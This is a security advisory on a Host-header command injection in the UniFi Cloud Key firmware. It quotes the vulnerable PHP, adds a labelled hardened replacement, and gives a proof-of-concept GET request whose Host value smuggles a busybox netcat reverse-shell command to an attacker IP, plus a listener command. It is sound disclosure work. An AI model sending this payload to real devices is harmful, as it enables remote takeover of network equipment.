SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key authenticated command injection

From: SEC Consult Vulnerability Lab <research@sec-consult.com>
To: bugtraq@securityfocus.com, fulldisclosure@seclists.org
Message-ID: <bee55eb3-cb9f-c75b-858b-3e280dc0d110@sec-consult.com>
Subject: SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key authenticated command injection


SEC Consult Vulnerability Lab Security Advisory < 20170804-1 >
=========================================================================
              title: Authenticated Command Injection
            product: Ubiquiti Networks UniFi Cloud Key
 vulnerable version: Firmware v0.6.1
      fixed version: Firmware v0.6.4
         CVE number:
             impact: High
           homepage: https://www.ubnt.com
              found: 2017-03-26
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=========================================================================

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:
------------------------
SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
A command injection can be triggered via the HTTP Host header of the GET
request to the status endpoint (/api/status). This vulnerability can be
exploited when the Cloud Key web interface is exposed to the Internet and an
attacker has valid credentials for it.

Proof of concept:
-----------------
The following PHP snippet is responsible for the command execution vulnerability:

(api.inc, line 265)
-------------------------------------------------------------------------------
[...]
function is_unifi_running() {
    // $c_host is taken straight from the client-supplied Host header
    if (!isset($_SERVER['HTTP_HOST'])) {
            $c_host = $_SERVER['SERVER_ADDR'];
    } else {
            $c_host = $_SERVER['HTTP_HOST'];
    }
    $unifi_href = 'http://' . $c_host . ':8080/status';
    // the unescaped value is concatenated into a shell command line
    exec(CMD_CURL . $unifi_href, $out, $rc);
    if ($rc == 0) {
        return true;
    }
    return false;
}
[...]
-------------------------------------------------------------------------------

Since $c_host is neither validated nor escaped before it is passed to exec(), a
command injection is possible through the Host header.
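Added example, not code from the Cloud Key firmware: a hardened replacement for is_unifi_running() that validates the Host value against a strict hostname/IPv4 grammar and removes the shell from the path entirely by using PHP's curl extension. The names sanitize_host() and is_unifi_running_hardened() are my own.

```php
<?php
// Added example, not the Cloud Key's own code. Two independent fixes for the
// injection in is_unifi_running(): the Host value is validated before use,
// and the URL is passed to libcurl as data instead of being concatenated into
// a command line for exec(). escapeshellarg() on the URL would also close the
// hole, but keeping attacker-controlled data out of any shell is the safer default.

// Returns the bare host from "host" or "host:port", or null when it is not a
// plain DNS name or IPv4 address (so ';', spaces, quotes etc. are rejected).
function sanitize_host(string $raw): ?string {
    if (!preg_match('/^([A-Za-z0-9.-]{1,253})(?::\d{1,5})?$/D', $raw, $m)) {
        return null;
    }
    $host    = $m[1];
    $is_ip   = filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
    $is_name = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    return ($is_ip || $is_name) ? $host : null;
}

function is_unifi_running_hardened(): bool {
    $raw  = $_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_ADDR'] ?? '127.0.0.1';
    $host = sanitize_host($raw);
    if ($host === null) {
        // A Host value that is not a plain hostname is never legitimate here;
        // log it, since this is exactly the shape of the published PoC request.
        error_log('is_unifi_running: rejected malformed Host header');
        return false;
    }
    // No shell involved: libcurl receives the URL as an argument, not a command.
    $ch = curl_init('http://' . $host . ':8080/status');
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_CONNECTTIMEOUT => 2,
        CURLOPT_TIMEOUT        => 5,
    ]);
    // Same semantics as the original rc == 0 check: did the request succeed?
    $ok = curl_exec($ch) !== false;
    curl_close($ch);
    return $ok;
}

// Constructed self-check, including the advisory's own PoC Host value.
var_dump(sanitize_host('192.168.0.30'));                                       // "192.168.0.30"
var_dump(sanitize_host('192.168.0.30:443'));                                   // "192.168.0.30"
var_dump(sanitize_host('192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;')); // NULL
```

The regex rejects the injected value outright, so the rejection can also be logged and alerted on as an exploitation attempt rather than silently ignored.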

The following GET request was used to open a reverse-shell via command injection
from the Cloud Key system (192.168.0.30) to the attacker (192.168.0.3):
-------------------------------------------------------------------------------
GET /api/status HTTP/1.1
Host: 192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
X-Access-Token: <Token>
Referer: https://192.168.0.30/login
Cookie: CKSESSIONID=<Session-ID>
Connection: close
-------------------------------------------------------------------------------

As the listener, netcat was used:
$ nc -lvp 8999

Vulnerable / tested versions:
-----------------------------
Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested. This version
was the latest at the time the security vulnerabilities were discovered.


Vendor contact timeline:
------------------------
2017-03-29: Contacting vendor via HackerOne. Vendor sets status to
            "Triaged".
2017-04-24: Asking for a status update; No answer.
2017-05-06: Found update 0.6.4 on the website of the vendor.
2017-05-15: Contacted vendor via e-mail and asked for status.
2017-05-16: Vendor closed the ticket and changed the status to "resolved".
            Current firmware version was v0.6.4. Set the publication
            date to 2017-08-04 (at least 90 days after fix).
2017-08-04: Public release of security advisory

Solution:
---------
Upgrade to v0.6.4 or above.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017

